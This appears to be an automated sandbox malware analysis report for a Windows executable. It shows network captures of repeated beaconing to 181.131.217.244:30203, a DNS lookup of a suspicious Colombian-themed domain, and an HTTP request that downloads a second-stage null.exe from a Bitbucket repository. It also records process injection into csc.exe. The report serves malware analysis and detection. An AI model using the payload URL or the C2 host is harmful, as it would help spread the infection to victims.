                                                                                    Dec 12, 2024 17:31:27.094475985 CET5001330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:27.095170021 CET5001330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:27.215197086 CET3020350013181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:27.215303898 CET5001330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:27.340334892 CET3020350013181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:28.567297935 CET3020350013181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:28.567368984 CET5001330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:28.567517996 CET5001330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:28.675867081 CET5001630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:28.687796116 CET3020350013181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:28.796668053 CET3020350016181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:28.796844006 CET5001630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:28.797542095 CET5001630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:28.920023918 CET3020350016181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:28.920366049 CET5001630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:29.040309906 CET3020350016181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:30.142260075 CET3020350016181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:30.142379999 CET5001630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:30.142580032 CET5001630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:30.253921032 CET5002130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:30.262444019 CET3020350016181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:30.373852015 CET3020350021181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:30.373965979 CET5002130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:30.374680996 CET5002130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:30.494906902 CET3020350021181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:30.495038986 CET5002130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:30.615091085 CET3020350021181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:31.699685097 CET3020350021181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:31.699754000 CET5002130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:31.699887991 CET5002130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:31.816504002 CET5002630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:31.819600105 CET3020350021181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:31.936372995 CET3020350026181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:31.936625957 CET5002630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:31.937269926 CET5002630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:32.057009935 CET3020350026181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:32.060486078 CET5002630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:32.180352926 CET3020350026181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:33.469799042 CET3020350026181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:33.469896078 CET5002630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:33.470086098 CET5002630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:33.581985950 CET5003230203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:33.589863062 CET3020350026181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:33.702234030 CET3020350032181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:33.702380896 CET5003230203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:33.703197002 CET5003230203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:33.823347092 CET3020350032181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:33.823477983 CET5003230203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:33.943397045 CET3020350032181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:35.021998882 CET3020350032181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:35.024368048 CET5003230203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:35.024559975 CET5003230203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:35.128895044 CET5003530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:35.144263983 CET3020350032181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:35.248732090 CET3020350035181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:35.248819113 CET5003530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:35.249511003 CET5003530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:35.369448900 CET3020350035181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:35.369585991 CET5003530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:35.489567995 CET3020350035181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:36.674189091 CET3020350035181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:36.674284935 CET5003530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:36.674576998 CET5003530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:36.785134077 CET5003930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:36.794214964 CET3020350035181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:36.904860973 CET3020350039181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:36.908396006 CET5003930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:36.909339905 CET5003930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:37.029126883 CET3020350039181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:37.032334089 CET5003930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:37.152112007 CET3020350039181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:38.367074013 CET3020350039181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:38.367243052 CET5003930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:38.367363930 CET5003930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:38.479608059 CET5004530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:38.487255096 CET3020350039181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:38.600281000 CET3020350045181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:38.600415945 CET5004530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:38.601188898 CET5004530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:38.722258091 CET3020350045181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:38.722356081 CET5004530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:38.842341900 CET3020350045181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:39.956231117 CET3020350045181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:39.956357002 CET5004530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:39.956505060 CET5004530203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:40.066839933 CET5005030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:40.078541040 CET3020350045181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:40.186695099 CET3020350050181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:40.186839104 CET5005030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:40.187768936 CET5005030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:40.309134960 CET3020350050181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:40.309252977 CET5005030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:40.429220915 CET3020350050181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:41.600303888 CET3020350050181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:41.600543022 CET5005030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:41.600754976 CET5005030203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:41.706963062 CET5005330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:41.720894098 CET3020350050181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:41.828227043 CET3020350053181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:41.828424931 CET5005330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:41.829246044 CET5005330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:41.949147940 CET3020350053181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:41.949229956 CET5005330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:42.069087982 CET3020350053181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:43.156250000 CET3020350053181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:43.156357050 CET5005330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:43.156507969 CET5005330203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:43.269299984 CET5005630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:43.276357889 CET3020350053181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:43.389300108 CET3020350056181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:43.389494896 CET5005630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:43.390203953 CET5005630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:43.510590076 CET3020350056181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:43.510746956 CET5005630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:43.630498886 CET3020350056181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:44.846896887 CET3020350056181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:44.846996069 CET5005630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:44.847160101 CET5005630203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:44.956803083 CET5005730203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:44.967361927 CET3020350056181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:45.076680899 CET3020350057181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:45.076878071 CET5005730203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:45.077989101 CET5005730203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:45.197726965 CET3020350057181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:45.199259043 CET5005730203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:45.321233988 CET3020350057181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:46.467596054 CET3020350057181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:46.471735954 CET5005730203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:46.472001076 CET5005730203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:46.582004070 CET5005830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:46.592505932 CET3020350057181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:46.703615904 CET3020350058181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:46.704382896 CET5005830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:46.705054045 CET5005830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:46.826546907 CET3020350058181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:46.826713085 CET5005830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:46.946814060 CET3020350058181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:48.040478945 CET3020350058181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:48.040533066 CET5005830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:48.040720940 CET5005830203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:48.144439936 CET5005930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:48.160399914 CET3020350058181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:48.264846087 CET3020350059181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:48.264919043 CET5005930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:48.265778065 CET5005930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:48.385636091 CET3020350059181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:48.385699034 CET5005930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:48.505698919 CET3020350059181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:49.641946077 CET3020350059181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:49.642010927 CET5005930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:49.642205954 CET5005930203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:49.754076004 CET5006130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:49.762145042 CET3020350059181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:49.874450922 CET3020350061181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:49.874530077 CET5006130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:49.875688076 CET5006130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:49.995604992 CET3020350061181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:49.995657921 CET5006130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:50.115622044 CET3020350061181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:50.396882057 CET5006130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:50.517230034 CET3020350061181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:50.517291069 CET5006130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:50.637172937 CET3020350061181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:51.348035097 CET3020350061181.131.217.244192.168.2.5
                                                                                    Dec 12, 2024 17:31:51.351552963 CET5006130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:51.351552963 CET5006130203192.168.2.5181.131.217.244
                                                                                    Dec 12, 2024 17:31:51.471470118 CET3020350061181.131.217.244192.168.2.5
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 12, 2024 17:30:06.213426113 CET5209253192.168.2.51.1.1.1
                                                                                    Dec 12, 2024 17:30:06.361099005 CET53520921.1.1.1192.168.2.5
                                                                                    Dec 12, 2024 17:30:08.461299896 CET5723153192.168.2.51.1.1.1
                                                                                    Dec 12, 2024 17:30:08.600192070 CET53572311.1.1.1192.168.2.5
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 12, 2024 17:30:06.213426113 CET192.168.2.51.1.1.10xe762Standard query (0)navegacionseguracol24vip.orgA (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:30:08.461299896 CET192.168.2.51.1.1.10x1401Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 12, 2024 17:29:39.372152090 CET1.1.1.1192.168.2.50x4ad7No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 12, 2024 17:29:39.372152090 CET1.1.1.1192.168.2.50x4ad7No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:29:41.091023922 CET1.1.1.1192.168.2.50xe204No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 12, 2024 17:29:41.091023922 CET1.1.1.1192.168.2.50xe204No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:30:06.361099005 CET1.1.1.1192.168.2.50xe762No error (0)navegacionseguracol24vip.org181.131.217.244A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:30:08.600192070 CET1.1.1.1192.168.2.50x1401No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:30:08.600192070 CET1.1.1.1192.168.2.50x1401No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:30:08.600192070 CET1.1.1.1192.168.2.50x1401No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                    • bitbucket.org
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.549788185.166.143.504432604C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-12 16:30:10 UTC101OUTGET /facturacioncol/fact/downloads/null.exe HTTP/1.1
                                                                                    Host: bitbucket.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-12-12 16:30:10 UTC5950INHTTP/1.1 302 Found
                                                                                    Date: Thu, 12 Dec 2024 16:30:10 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 0
                                                                                    Server: AtlassianEdge
                                                                                    Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIGUX6ORX&Signature=Zjqmry%2BNGZ5szyFv0hOwnpTu2lo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJIMEYCIQCGK9zub4%2FRHXDXeMN6k7XbjWwi0RJXwId9Ng33n0K%2F8QIhAN1Z2SPiS2gBnFaWWj6eia3uOu6PtMwycvP14HCcOT8YKrACCML%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwcdwWUJNKUMa%2FVym4qhALnixtfvkFlXAR1WJ687dROjrNTrlqec61HZk4xyIIbcd%2BRgXd%2Fh168iQ4%2BTw9BMZ81Zwv1RSJSVyNitKiXJcfIQRolpUMKdiNxfFyyqqcS0Tg2S3lJkWed%2BtKsHpen1E%2FDAnwDyxdvLayliINqWRXGDW9o6tVJBmDEqSXaOt6hqwZ%2FZha79%2Ff8W3BbEbePj2r6gzjnKKD7c1Ovt6LbwVJN%2B9jBhD2fyIBe5Lh3ZNbIVl4daY0oFLDS4VVAIEjburQUN4QSd7FkqlJhmbW3zmDwMI5%2Fb2gCZabQeQoSAb8VczrPcqmysGUiRjzARXLheXFHYDegGiflUK0oIiw2VGfaVRixBDCWnOy6BjqcARFHPbVaro%2BtHveeLvVVaDflun9rRVYAEJEvIZ58bqvNw79lxq2jSq9Ozh3SUPLz%2B6oHkYiGFJsYRa7HJIWuZdD%2FxHsyV%2BkzTZEx49KbjWL [TRUNCATED]
                                                                                    Expires: Thu, 12 Dec 2024 16:30:10 GMT
                                                                                    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                    X-Used-Mesh: False
                                                                                    Vary: Accept-Language, Origin
                                                                                    Content-Language: en
                                                                                    X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                    X-Dc-Location: Micros-3
                                                                                    X-Served-By: 480b74a7eeb0
                                                                                    X-Version: b7875da02c7c
                                                                                    X-Static-Version: b7875da02c7c
                                                                                    X-Request-Count: 3908
                                                                                    X-Render-Time: 0.048584699630737305
                                                                                    X-B3-Traceid: c7d99ce838454ef8a33ef3bc93cffee3
                                                                                    X-B3-Spanid: 3f76c13fd875c584
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Content-Security-Policy: object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn [TRUNCATED]
                                                                                    X-Usage-Quota-Remaining: 999136.030
                                                                                    X-Usage-Request-Cost: 878.03
                                                                                    X-Usage-User-Time: 0.026341
                                                                                    X-Usage-System-Time: 0.000000
                                                                                    X-Usage-Input-Ops: 0
                                                                                    X-Usage-Output-Ops: 0
                                                                                    Age: 0
                                                                                    X-Cache: MISS
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Xss-Protection: 1; mode=block
                                                                                    Atl-Traceid: c7d99ce838454ef8a33ef3bc93cffee3
                                                                                    Atl-Request-Id: c7d99ce8-3845-4ef8-a33e-f3bc93cffee3
                                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                    Server-Timing: atl-edge;dur=159,atl-edge-internal;dur=4,atl-edge-upstream;dur=156,atl-edge-pop;desc="aws-eu-central-1"
                                                                                    Connection: close


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:11:29:43
                                                                                    Start date:12/12/2024
                                                                                    Path:C:\Users\user\Desktop\pPLwX9wSrD.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\pPLwX9wSrD.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:10'485'760 bytes
                                                                                    MD5 hash:1492E1506AFEDAD20933AE244CF658D1
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:11:30:02
                                                                                    Start date:12/12/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                    Imagebase:0x890000
                                                                                    File size:2'141'552 bytes
                                                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3523495000.00000000099F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3521980396.0000000008242000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3521352384.00000000070A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:0.1%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:26.7%
                                                                                      Total number of Nodes:15
                                                                                      Total number of Limit Nodes:1
                                                                                      execution_graph 27285 457720 27287 45772e VirtualProtect 27285->27287 27288 4577bb 27287->27288 27291 4577f2 27287->27291 27292 4577d8 ExitProcess ExitProcess ExitProcess ExitProcess ExitProcess 27288->27292 27293 4830cf 27294 4830db __getbuf task 27293->27294 27295 4830e7 GetVersionExA 27294->27295 27296 48312f 27295->27296 27297 45943f 27298 459479 27297->27298 27300 45946a ExitProcess 27297->27300 27302 45948f 27298->27302 27305 4594a1 27302->27305 27306 4594cc ExitProcess 27305->27306

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 92 4572fb-457324 93 457326-457364 92->93 94 457369-4573aa 92->94 99 457788-4577b9 VirtualProtect 93->99 105 4573ac-4573ea 94->105 106 4573ef-4574b3 call 457415 94->106 102 4577f2-457875 call 457877 99->102 103 4577bb-4577d7 call 4577d8 99->103 105->99 115 45777c-457782 106->115 116 4574b9-457563 call 4574df call 45751f call 457566 106->116 115->99 116->99
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004577B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
